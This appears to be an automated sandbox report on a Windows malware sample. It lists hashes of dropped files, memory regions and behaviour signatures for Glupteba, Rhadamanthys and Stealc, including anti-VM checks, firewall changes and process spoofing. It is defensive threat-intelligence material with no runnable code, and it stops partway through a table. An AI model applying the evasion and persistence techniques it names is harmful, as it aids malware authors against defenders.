| SHA512 | 35d12e81eb892aeb2237049beca61a81469dea5b1c9b7a0b9f49fbf95a95c756509d9e76c732fb10b504f9f9692e1fbe83ea2fd09d791f793a928c01974b8147 |
memory/4640-83-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/4912-87-0x00000000008D0000-0x000000000093E000-memory.dmp
memory/4912-89-0x00000000745E0000-0x0000000074D90000-memory.dmp
C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe
| MD5 | e2a6c1f58b137874e490b8d94382fcdb |
| SHA1 | 71529c5d708091b1e1a580227dc52e62a140edd1 |
| SHA256 | 4801879a7afb9d03f7edcbe76cd9306cb024d80abc8512c4995aa97e8fd52437 |
| SHA512 | 24d12ce668e5189a4ba80520a4eaf480d17d3a07d8d0d4312964968f8489143df225881ec70e39e0c62e381061626801ead72d70cea164e2c3870bfbd7bc4eff |
memory/4912-102-0x00000000052C0000-0x00000000052D0000-memory.dmp
memory/1464-104-0x0000000002720000-0x000000000276A000-memory.dmp
memory/1464-106-0x0000000000400000-0x0000000000B06000-memory.dmp
memory/5084-107-0x0000000000400000-0x000000000046D000-memory.dmp
memory/1464-108-0x0000000000C70000-0x0000000000C71000-memory.dmp
memory/1464-110-0x0000000000C70000-0x0000000000C71000-memory.dmp
memory/1464-112-0x0000000000C70000-0x0000000000C71000-memory.dmp
memory/1464-113-0x0000000000C80000-0x0000000000D80000-memory.dmp
memory/5084-114-0x0000000000400000-0x000000000046D000-memory.dmp
memory/4912-115-0x0000000002CA0000-0x0000000004CA0000-memory.dmp
memory/5084-116-0x0000000000400000-0x000000000046D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\un4.0.exe
| MD5 | ab1dbed7cd6c1bf01ab77d12d1b86cd8 |
| SHA1 | ccfd0f691e8e75ed0fb9a436032167cc633ce68b |
| SHA256 | b5389bf868f62fcbdebccd4a8014ab6b3c0164de09913f34d6fa18f36cbcb1a5 |
| SHA512 | 1f83592156ee5479024aad34b1f856826c869758172d44b5d3052cf7b076ece37fde55a1d6ec572aceeac13172b48c65733c008f066fade447ec807837d26587 |
C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe
| MD5 | ba0d14f5874f5d2e7fb5c6a1a9b675dc |
| SHA1 | a99194ec87f921dfc74890dda2b5db6372a44547 |
| SHA256 | 6d1698c7355202b13ab98193ca2b3cf9e159de306885b630c7a5714a0aa651df |
| SHA512 | 88f8357c673b49f0896721a68fc330497579d082b772f8640db96198c92edb5aca5239f39b6a427f748d49d2288ce876c1458f321d1ceb88adec1bc437385741 |
memory/1352-142-0x0000000002BA0000-0x0000000002FA8000-memory.dmp
memory/856-143-0x0000000000B80000-0x0000000000BA7000-memory.dmp
memory/856-144-0x0000000000400000-0x0000000000AEA000-memory.dmp
memory/1464-146-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-150-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-151-0x0000000003190000-0x0000000003290000-memory.dmp
memory/4912-149-0x00000000745E0000-0x0000000074D90000-memory.dmp
memory/1464-148-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-147-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-153-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-154-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-159-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-160-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-158-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-157-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-162-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-164-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-163-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-156-0x0000000003190000-0x0000000003290000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\un4.1.exe
| MD5 | eee5ddcffbed16222cac0a1b4e2e466e |
| SHA1 | 28b40c88b8ea50b0782e2bcbb4cc0f411035f3d5 |
| SHA256 | 2a40e5dccc7526c4982334941c90f95374460e2a816e84e724e98c4d52ae8c54 |
| SHA512 | 8f88901f3ebd425818db09f268df19ccf8a755603f04e9481bcf02b112a84393f8a900ead77f8f971bfa33fd9fa5636b7494aaee864a0fb04e3273911a4216dc |
memory/1464-174-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-173-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-175-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-180-0x0000000003190000-0x0000000003290000-memory.dmp
memory/5084-181-0x0000000003720000-0x0000000003B20000-memory.dmp
memory/1464-182-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-185-0x0000000003190000-0x0000000003290000-memory.dmp
memory/5084-184-0x00007FFB53BB0000-0x00007FFB53DA5000-memory.dmp
memory/1464-187-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-189-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-194-0x0000000003290000-0x00000000032D0000-memory.dmp
C:\Users\Admin\Pictures\aYoDWoALsh7fWmLZJgqz1ZSo.exe
| MD5 | 4204b9d4c4df5c4b4d67922db24f342a |
| SHA1 | 9255b5e94028f3f55adda2576d60bd39452eaf08 |
| SHA256 | 62cd7b447bdee3ec1670c92d9585e1fddbaa5d4ee824dee8f15940005bf95414 |
| SHA512 | 0b4ed4d6397c9f34cf2c72d9c581a6e5d94eabf395da0010073b1600883dac6fcc48c1606ffee29952bd60707caf03b8a6d6cf644b2ac668306b4a418d726423 |
memory/1464-195-0x0000000003290000-0x00000000032D0000-memory.dmp
memory/1404-193-0x0000000000E90000-0x0000000000E99000-memory.dmp
memory/5084-188-0x0000000076490000-0x00000000766A5000-memory.dmp
memory/1464-183-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1404-205-0x0000000002AB0000-0x0000000002EB0000-memory.dmp
memory/856-207-0x0000000061E00000-0x0000000061EF3000-memory.dmp
memory/1404-215-0x0000000076490000-0x00000000766A5000-memory.dmp
memory/1404-209-0x00007FFB53BB0000-0x00007FFB53DA5000-memory.dmp
memory/5084-179-0x0000000003720000-0x0000000003B20000-memory.dmp
memory/1464-178-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-177-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-176-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1464-155-0x0000000003190000-0x0000000003290000-memory.dmp
memory/1352-145-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/440-257-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp
memory/440-259-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp
memory/440-275-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp
memory/440-271-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp
memory/832-284-0x0000000000400000-0x0000000000B0D000-memory.dmp
memory/440-283-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp
memory/440-281-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
memory/440-262-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp
C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
| MD5 | bd950871b09f9fcfa3466fb1b2b5d556 |
| SHA1 | 0722e0ddae63ea95c95fb2fa49300c452de8ddc1 |
| SHA256 | e73bcab8e2404cb75d65a8ccd9f256d87ad77f432663f04487628afd12a30051 |
| SHA512 | f7cad1bc16d3aa8456c15f5c57828afa5d6d764aed2b23b71ac8f95ad51796be17e14943c7c97133414f7f92c91b741f3c773ed6266597e9c78d7970ccaee2b7 |
C:\Users\Admin\AppData\Local\Temp\Opera_installer_2403281421293134424.dll
| MD5 | 2c8ab707b79399f1cbaf2cd17003d614 |
| SHA1 | 034bd6bbd7123627ca202b6b35b9018261fc03d5 |
| SHA256 | c8cbcc07e14d8e019e5927126fb5ff30ec1d77f9f351d5738b73c228f02eaede |
| SHA512 | d0f559744068666b3d3cfe9db4ea00ee40a5cc9ab70dfa095c3cbb19dd2fff13746db1bec814ce4faff6df6ebaaa39af62e7e55dd43bea5be6ef356a9c127888 |
C:\Users\Admin\AppData\Roaming\Temp\Task.bat
| MD5 | 11bb3db51f701d4e42d3287f71a6a43e |
| SHA1 | 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86 |
| SHA256 | 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331 |
| SHA512 | 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2 |
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | 5f5e97ba939baf708a1b2b1bb7acbb7e |
| SHA1 | 194294ed2caec5608dbe4b9f3d00bbf9f738050e |
| SHA256 | 733e6e77f50f0e5e30df357748ae8cddde48e6a35e50ec77f84765e8e19215a8 |
| SHA512 | 94acf10f3b6bf77c5ed01932ee3607deede25cbb453cf3ab7a8ae5f5775d2152d88508b991efacf264d5e7b51880de59fbdf0ed7932ee940cd223d1de8b9e800 |
C:\Users\Admin\Pictures\EwbpoERL2KXj9VGzo9QBTWpU.exe
| MD5 | aaab26342c7e93c5b29fcaec60dd84d9 |
| SHA1 | a02b822ee13767ca224a37494adda8ad3b34db92 |
| SHA256 | 30b64050f5874a74cb1ddc70578c6c30d70edd4d43f8b91f4597aa3d1a405648 |
| SHA512 | ad01fdbac1fa2b3ccf62d4c76d458bb5288a6e1664a6188417e5872104474567765ff364e66c5a66d350f921c542a43fde1ba301af60b76bac35d0c7541c9097 |
memory/1464-406-0x0000000000400000-0x0000000000B06000-memory.dmp
memory/4640-413-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/2980-415-0x0000000000400000-0x0000000000ECD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS925D.tmp\Install.exe
| MD5 | 19024664b4bd6c49e4d898317b4a2a33 |
| SHA1 | f6d8c538ab5444df258ffd2d958bd4db65997bd9 |
| SHA256 | 11b47b3d9cf14562aabfaa2e4e9e67ebbb00fb3e31f9f44f148d03cd3fc3da37 |
| SHA512 | 2d0f64c5ca2e1ea9af44e5c7b836efe7d02feb29915f148ce2e69ab70435a57dbe15f26a2e096d414f1cdad87066c8486397cf3de982afbe1aea74bc4def0475 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r4elbyuy.asy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe
| MD5 | b119ea556def66eaa9f751a650b45af0 |
| SHA1 | daf3fa0325b110183d0a233b4b0d1875f0b49ca8 |
| SHA256 | 53c38771ea9986f418a48d89e4df5e82c84f1e71a4c242fc6e6ae3ba934cf6d4 |
| SHA512 | 08dd919ce39af698051b4f156faa8d155c41cc0de3412ef152dc6e90cbdd5cb50109f57c47555925fd6d18816411b1c510ac642b9576f5f28540be8695ed46c4 |
memory/4912-466-0x0000000010000000-0x00000000105E5000-memory.dmp
memory/856-479-0x0000000000400000-0x0000000000AEA000-memory.dmp
memory/1352-491-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/4232-502-0x0000000000400000-0x0000000000930000-memory.dmp
memory/440-504-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp
memory/4640-515-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/2980-517-0x0000000000400000-0x0000000000ECD000-memory.dmp
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 1d7f3d1036cc09d2b9c5d8d5acfbb867 |
| SHA1 | 5a76ade3e2ced7d72b6ce450b074d3c5aaa13b85 |
| SHA256 | 0725190ee120338da973024f3d633bd17d0009af194000fa0a91dde961a8d76c |
| SHA512 | dc993da2058b91cd4870b0e868963cadd68d0c03aee091691d7ed0a027215ef5114c9d56ec8d9e228cd7d022339d277903fc12481e2e00df758a3915a17d1fd8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 86526e07bf8a7bf6bfbd055d4ef90965 |
| SHA1 | 7f0f00e327905b09a38771f3aaa445fb79c999d2 |
| SHA256 | 66344994362215c8fd590e6a64db279aceb65dab68303b9d664087966d33b92b |
| SHA512 | 76ce10a825c2bdfb1cd3618c81c4311d5a45af970934d2d2d085b61fb3dccefca39e7db2418cc077ffc0c2152d98041287289d83cf12243d1f85fb49531ff0cd |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\opera_package
| MD5 | 856c0e24f5ee9715ee77bd4fef0995ae |
| SHA1 | 02b109c418bfdee0fc725faa35f8c45ae0725929 |
| SHA256 | 74e4528ae1db501f4f5f714aead1a052b8d20cf30167ca6218f5718601e85ff1 |
| SHA512 | 242d571acb0b2c35a7272a3e739ab707242cbe17109dc14bc86de38a238238539f867842ea242ba4122f657e033abe4210c107582bbf49ab47f0e9c267e6f6ff |
memory/4640-585-0x0000000000400000-0x0000000000ECD000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | b3277d222d933b2d9999772f3be64c86 |
| SHA1 | 1122893d91bbfe786382afbd8e24efe4cd49b71f |
| SHA256 | 0b36857c72ffd39300006901e9bad42720add740cdd4dfd890baf868ce775c2b |
| SHA512 | d20f3c6ed3cc7f1a90acf35fa8410ff9e2f2d8ef4c005812012e94f15b287165f2fd8830b932cfc9150fa28652004c2bbc83d45f67132a3b22210701e5353aaa |
memory/1352-605-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/3536-615-0x0000000010000000-0x00000000105E5000-memory.dmp
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
memory/4232-675-0x0000000000400000-0x0000000000930000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | b7730734a19453b63c20f753914ec7e0 |
| SHA1 | 6fb18889f2a3f9ae06447abfc8fdf9ad6e119661 |
| SHA256 | ee77e6e66a80a6657be8c355021ea18520da80a54ac61915c681fef7163c6b74 |
| SHA512 | c53972c47b738821be5c59dc282eb7ac61db18294ccad806fd592f8c51d3732dcc1137699a638767546d3ecc496761cef34a1c471631203c93f4e4cefad25bd8 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 29e28e9da37e4900bc6113254ee685c3 |
| SHA1 | 9ff27a74c5e5c77a4d6b12d3582a04b2a527bfef |
| SHA256 | b747fa492595344414e5f008b1092086c3a1a6e92cb03886be17eddbedb267cd |
| SHA512 | c618bf7587fe0d90d4b27348de1c6ed4e6fe9a5118509c1970201fcc425544589b8372eef45fe5468c693a25168522264d88672bc15d63346d91fde5b97d12ce |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\additional_file0.tmp
| MD5 | 20d293b9bf23403179ca48086ba88867 |
| SHA1 | dedf311108f607a387d486d812514a2defbd1b9e |
| SHA256 | fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348 |
| SHA512 | 5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\dbgcore.DLL
| MD5 | 8b6f64e5d3a608b434079e50a1277913 |
| SHA1 | 03f431fabf1c99a48b449099455c1575893d9f32 |
| SHA256 | 926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2 |
| SHA512 | c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\dbghelp.dll
| MD5 | 925ea07f594d3fce3f73ede370d92ef7 |
| SHA1 | f67ea921368c288a9d3728158c3f80213d89d7c2 |
| SHA256 | 6d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9 |
| SHA512 | a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe
| MD5 | b3f05009b53af6435e86cfd939717e82 |
| SHA1 | 770877e7c5f03e8d684984fe430bdfcc2cf41b26 |
| SHA256 | 3ea8d40fcede1fc03e5603246d75d13e8d44d7229d4c390c39a55534053027f7 |
| SHA512 | d2dee80aaa79b19f1eb1db85079a05f621780e06bfea9e838b62d757ba29399f9090ec7c6ff553377c9b712f3ba8dd812cdff39f3e28829928e86746a8ac6b27 |
memory/2980-842-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/6048-893-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/6092-894-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/6140-896-0x0000000000400000-0x0000000000ECD000-memory.dmp
memory/856-921-0x0000000000400000-0x0000000000AEA000-memory.dmp
C:\ProgramData\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | 9617ff9799fe2a5905f4f2bb40301428 |
| SHA1 | fe8e85956516141380711524c31158b10c74d98a |
| SHA256 | 40ebeab3c0fe603a36fed5f862bc68b9db0b0658e601e7442f50e9a9b375f000 |
| SHA512 | 69a3e6e0e3308ab6ea07fb26f88223d9f746f652fe86cc63454c0e65c465bc936b0f39a7a2bf279737beae8502127dcb146df2d0b9e17380ec3ed9f273665804 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
| MD5 | bd6b60b18aee6aaeb83b35c68fb48d88 |
| SHA1 | 9b977a5fbf606d1104894e025e51ac28b56137c3 |
| SHA256 | b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55 |
| SHA512 | 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\xh4b7nwe.default-release\prefs.js
| MD5 | e08514b62d586e3f54f9951b8a91fc4d |
| SHA1 | 22ededc0b5b4ca5bbe5ca381df05333aeab00c48 |
| SHA256 | abded86c72a94406d1696920b852e68b594086ea3efcf3ce2fd40d09cdd895a6 |
| SHA512 | 415089cc8ad411a908d00b193c17d6786575a62345de0b14b00e662ee651198874fa55b7332e351aae37522b4494bf799e65893055ca9a598dd89207255f2c30 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 1426cf5b31a2b1beee6e611411cfc459 |
| SHA1 | 0f7a65812c00ae6b9b9ebb7e8ec192eb96f72a58 |
| SHA256 | b812aed4b1e3e7730b3850f36fc689d3372dd1c1477a3cc3e7e166b956b25c4f |
| SHA512 | 6f63e92705825eae65b2d97d3a7065c37fd3c73064319e403c6b7d2470d2a2d3aa3f3f1bc682120b8eef76b5e3638c4edac0e3f58ac9f1258af9e3f1ad3ee95a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 014de499a6e8a79751040cebb2248add |
| SHA1 | e9cb08c31fff55bfada1bf01b1f5630d43b78587 |
| SHA256 | 0c71582a4de3581f7d143d27737c4233bb1fc444d93359309d5101a655b3b51f |
| SHA512 | 4e4f2605be24d48fe5da70f7cb79085f058e75c055dd727ad1cec3ecbb9d61d95923a3341cfa6f6cf3872f47966becc047bd927ead076eac4268eb7f2d723a81 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | eeab3117b09381cf034cd6b49df62d62 |
| SHA1 | f2240e62148ba03f5328cb3c2f256f41bc6566c6 |
| SHA256 | ab394c24fb6ef88f2969c369db39f56b7c56bec1e012412407004542a1551863 |
| SHA512 | e12af7bd85bf29390396e6087f98dc570d6003e00a8ff28d2cf151427e5d38c97e94825fe079954b52081ca7183805e7552066386bb7177d05a3a98a4c53c498 |
C:\Users\Admin\AppData\Local\Temp\7zSBEFA.tmp\__data__\config.txt
| MD5 | 390ac3f2b52e0f0d283f9aaf5f6b1661 |
| SHA1 | 8237596cbd07487c309fb51f424d7b08be11a2b0 |
| SHA256 | 8083b98be75e90531952fc20da8e437f8b5523a3735fb96cfd1eed4e894e39cb |
| SHA512 | 8101f5d56a9b74732715c18146d88338c208ff1cb16498f6f95ba295784e7049f6558af4088f9d4ad99ab9d090cd612b56a837243474396dd0943ea7ed52a632 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-28 14:21
Reported
2024-03-28 14:23
Platform
win11-20240221-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe | N/A |
Rhadamanthys
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3208 created 2828 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | C:\Windows\system32\sihost.exe |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u2zg.0.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\gqaPwdJNBuiwAUU5K6wLgvi5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS87BE.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS9D2A.tmp\Install.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\gMqqyxU.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
